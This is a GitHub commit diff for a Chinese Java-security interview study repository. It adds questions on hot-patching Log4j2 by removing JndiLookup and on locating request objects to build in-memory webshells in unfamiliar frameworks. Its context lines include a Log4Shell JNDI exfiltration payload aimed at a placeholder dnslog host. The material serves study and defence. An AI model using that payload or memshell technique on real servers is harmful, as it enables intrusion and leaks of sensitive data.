File tree Expand file tree Collapse file tree 3 files changed +20
-3
lines changed
Expand file tree Collapse file tree 3 files changed +20
-3
lines changed Original file line number Diff line number Diff line change 2222
2323[ Shiro框架相关的安全问题 - 7个] ( https://github.com/4ra1n/JavaSecInterview/tree/master/shiro )
2424
25- [ Log4j2组件相关的安全问题 - 6个 ] ( https://github.com/4ra1n/JavaSecInterview/tree/master/log4j2 )
25+ [ Log4j2组件相关的安全问题 - 7个 ] ( https://github.com/4ra1n/JavaSecInterview/tree/master/log4j2 )
2626
27- [ 内存马专题 - 6个 ] ( https://github.com/4ra1n/JavaSecInterview/tree/master/memshell )
27+ [ 内存马专题 - 7个 ] ( https://github.com/4ra1n/JavaSecInterview/tree/master/memshell )
Original file line number Diff line number Diff line change 4343在` SpringBoot ` 情况下可以使用` bundle:application ` 获得数据库密码等敏感信息
4444
4545这些敏感信息可以利用` dnslog ` 外带` ${jndi:ldap://${java:version}.xxx.dnslog.cn} `
46+
47+
48+
49+ - 不停止运行程序如何修复Log4j2漏洞(★★★)
50+
51+ 利用JavaAgent改JVM中的字节码,可以直接删了` JndiLookup ` 的功能
52+
53+ 有公众号提出类似` Shiro ` 改` Key ` 的思路,利用反射把` JndiLookup ` 删了也是一种办法
54+
Original file line number Diff line number Diff line change @@ -48,4 +48,12 @@ Spring内存马有:Controller型,Interceptor型
4848
4949- Java Agent内存马的查杀(★★★)
5050
51- 网上师傅提到用` sa-jdi.jar ` 工具来做,这是一个JVM性能检测工具,可以dump出JVM中所有的Class文件,尤其重点关注` HttpServletr.service ` 方法,这是Agent内存马常用的手段
51+ 网上师傅提到用` sa-jdi.jar ` 工具来做,这是一个JVM性能检测工具,可以dump出JVM中所有的Class文件,尤其重点关注` HttpServletr.service ` 方法,这是Agent内存马常用的手段
52+
53+
54+
55+ - 如果有一个陌生的框架你如何挖内存马(★★★)
56+
57+ 核心是找到类似` Tomcat ` 和` Spring ` 中类似` Context ` 的对象,然后尝试从其中获取` request ` 和` response ` 对象以实现内存马的功能。可以从常见的类名称入手:Requst、ServletRequest、RequstGroup、RequestInfo、RequestGroupInfo等等。可以参考c0ny1师傅的` java-object-searcher ` 项目,半自动搜索` request ` 对象
58+
59+
You can’t perform that action at this time.
0 commit comments